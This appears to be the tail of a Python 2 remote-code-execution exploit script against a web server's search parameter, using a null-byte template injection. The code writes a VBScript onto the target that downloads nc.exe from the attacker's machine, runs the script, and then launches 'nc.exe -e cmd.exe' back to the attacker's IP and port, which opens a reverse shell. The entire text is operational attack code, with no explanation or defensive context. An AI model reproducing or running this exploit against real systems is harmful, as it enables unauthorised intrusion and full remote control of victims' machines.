 	def script_create():
 		urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")
 	def execute_script():
 		urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")
 	def nc_run():
 		urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")
 	ip_addr = "192.168.44.128" #local IP address
 	local_port = "443" # Local Port number
 	vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
 	save= "save|" + vbs
 	vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
 	exe= "exec|"+vbs2
 	vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
 	exe1= "exec|"+vbs3
 	script_create()
 	execute_script()
 	nc_run()
 except:
 	print """[.]Something went wrong..!
 	Usage is :[.] python exploit.py <Target IP address>  <Target Port Number>
 	Don't forgot to change the Local IP address and Port number on the script"""